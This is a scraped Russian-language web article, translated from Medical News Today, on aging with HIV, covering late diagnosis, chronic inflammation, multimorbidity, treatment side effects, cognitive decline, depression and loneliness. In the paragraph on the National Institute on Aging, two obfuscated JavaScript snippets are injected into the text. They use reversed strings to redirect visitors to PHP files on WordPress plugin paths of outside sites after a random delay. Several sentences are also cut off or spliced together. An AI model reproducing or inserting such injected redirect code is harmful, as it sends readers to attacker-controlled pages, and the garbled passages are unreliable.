Старение с ВИЧ: что говорит доказательная медицина?

Невероятный успех антиретровирусной терапии означает, что большинство людей с ВИЧ теперь могут рассчитывать на долгую и полноценную жизнь. Однако растущее число людей старшего возраста с ВИЧ сталкивается с рядом проблем в контексте физического и душевного здоровья. «СПИД.ЦЕНТР» публикует перевод статьи Medical News Today о диагностике и лечении ВИЧ-инфекции в старшем возрасте.

В 1995 году, с всех людей с диагнозом ВИЧ, живущих в США, достигли возраста пятидесяти лет и старше, согласно данным Центров по контролю и профилактике заболеваний (CDC). CDC отмечают, что среди 37 881 человека, получивших диагноз ВИЧ в этом году, один из шести относился к этой возрастной группе.

Поздняя диагностика

Как правило, человеку старшего возраста требуется больше времени, чтобы узнать о своем диагнозе. В 2015 году, например, 50 % лиц в возрасте пятидесяти пяти лет и старше, которым поставили диагноз ВИЧ, уже жили с инфекцией четыре с половиной года или дольше. Это важно, потому что, несмотря на успех антиретровирусной терапии, чем дольше ВИЧ не лечат, тем больше непоправимого урона вирус причиняет телу, в частности — его нервной и иммунной системам.

Исследование показывает, что люди, которые получают диагноз позже других, как правило, хуже реагируют на антиретровирусную терапию, и это приводит к ухудшению результатов лечения в плане продолжительности и качества жизни в целом. Кроме того, отсроченные постановка диагноза и начал лечения повышают вероятность передачи инфекции другим людям.

Национальный институт старения (NIA) $NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}today.com/articles/316329″>острые симптомы ВИЧ-инфекции, которые возникают в течение двух-четырех недель после заражения, а также $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and-older-people#older”>они могут начать стареть раньше, чем люди без вируса, и имеют повышенные риски сердечно-сосудистых заболеваний и деменции.

Физические проблемы

Большая часть специфических проблем с физическим здоровьем, с которыми встречаются люди старшего возраста с ВИЧ, относится к одной из трех широких категорий:

— усилению инфламэйджинга, то есть обширного хронического воспаления, связанного с нормальным процессом старения;

— взаимосвязанности нескольких заболеваний, или полиморбидности;

— побочным эффектам антиретровирусной терапии.

Инфламэйджинг

Исследователи предполагают, что иммунная система людей старшего возраста с ВИЧ хуже идет на поправку при антиретровирусном лечении по сравнению с более молодыми людьми.

Кроме того, несмотря на эффективное антиретровирусное лечение, обширное хроническое воспаление, связанное с нормальным процессом старения (которое называют инфламэйджингом, или and-how-to-combat-it”>старением иммунной системы), более выражено среди людей с ВИЧ, чем среди людей того же возраста без этой инфекции.

Исследователи отмечают, что хроническое воспаление связано с большинством заболеваний старшего возраста, включая диабет второго типа, сердечно-сосудистые заболевания, рак и деменцию. Оно также вносит свой вклад в аутоиммунные заболевания (при которых иммунная система атакует собственные ткани тела), такие как ревматоидный артрит.

Инфламэйджинг связывают с дисбалансом различных типов иммунных клеток и повышенной концентрацией провоспалительных сигнальных молекул. У людей старшего возраста с ВИЧ инфламэйджинг данным CDC, как возраст, так и ВИЧ повышают риск развития сердечно-сосудистых заболеваний, хронической обструктивной болезни легких (ХОБЛ), атрофии костной ткани и определенных форм рака. Можно привести в пример исследование, которое показывает, что люди с ВИЧ больше рискуют столкнуться с сердечным приступом.

Из-за инфламэйджинга и поздней постановки диагноза люди старшего возраста с ВИЧ скорее могут столкнуться с полиморбидностью, когда несколько хронических заболеваний влияют друг на друга, ухудшая здоровье в целом.

Побочные эффекты лечения

Люди старшего возраста могут быть более подвержены побочным эффектам АРВТ. С возрастом почки и печень начинают менее эффективно выводить токсины. К тому же инфекции, которые часто сопутствуют ВИЧ, такие как гепатит С, могут дополнительно ухудшать функцию печени.

CDC отмечают, что люди в возрасте пятидесяти лет и старше, а также работающие с ними медики, должны внимательно относиться к возможности взаимного влияния антиретровирусных препаратов и препаратов для лечения возрастных заболеваний, таких как ожирение, повышенное давление, диабет и повышенный уровень холестерина в крови.

Психическое здоровье и когнитивные функции

Среди возможных осложнений следует указать:

— ВИЧ-ассоциированные нейрокогнитивные расстройства (HAND);

— депрессию;

— травму

— одиночество.

До 45 % людей, живущих с ВИЧ, сталкиваются с ухудшением когнитивных функций, таких как память, концентрация, способность планировать и принимать решения. В прошлом, до появления комбинированной АРВТ, у людей с ВИЧ часто развивалась деменция, но теперь это менее распространено.

Однако когнитивные проблемы, скорее всего, окажутся куда серьезнее, если диагноз ВИЧ поставлен поздно, что, как мы видели, часто случается с людьми старшего возраста. Чем дольше инфекция действует бесконтрольно, тем больше вреда она причиняет центральной нервной системе, либо напрямую, либо в результате хронического воспаления.

Исследователи полагают, что отдельные частицы вируса могут оставаться в мозгу, даже когда ВИЧ неопределим в крови благодаря лечению. Причиной может быть то, что гематоэнцефалический барьер не позволяет антиретровирусным препаратам проникать в мозг.

Депрессия, травма и одиночество

Исследование показывает, что около 40 % лиц старшего возраста с ВИЧ испытывают депрессию.

Люди старшего возраста могут ощущать стигму, неуверенность в себе и смущение, связанное с диагнозом.

Специалисты Нью-Йоркского университета писали, что у некоторых пациентов старшего возраста травма жизни с ВИЧ развивается на протяжении многих лет: «Травму вызывает долгая жизнь с ВИЧ, особенно в начале эпидемии, когда шансов на выживание было мало (то есть до 1995–1996 годов), что приводило к почти бесконечным потерям людей, близких по социальному кругу». Специалисты также отмечают, что люди старшего возраста, живущие с ВИЧ, чаще оказываются представителями расового, этнического или сексуального меньшинства, и потому многие из них «жили в условиях гомофобии, сексизма, расовой или этнической дискриминации и экономического неравенства».

по теме

лечение

Старение и ВИЧ. Новые подходы к лечению

Одиночество — распространенная проблема среди людей старшего возраста в целом, но тех, кто живет с ВИЧ, оно ранит особенно часто. В 2018 году во время опроса лиц в возрасте от пятидесяти лет, живущих с ВИЧ, в Сан-Франциско (Калифорния), 58 % сообщили о симптомах одиночества от средних до тяжких. Эти участники чаще имели более узкий круг поддержки и также сообщали о депрессии, курении и проблемах с алкоголем или наркотикам.

Авторы пишут: «Многие люли, которые долго живут с ВИЧ, известные также как долгожители, теряют значительную часть своих социальных связей, что может приводить к усилению ощущения одиночества». Они отмечают: опрос лиц в возрасте шестидесяти лет и старше показал, что с одиночеством сталкиваются около 40 %.

Рост жизнестойкости и самообладания

С другой стороны, сайте HIV.gov, который ведет Министерство здравоохранения и социальных служб США.

Подписывайтесь на канал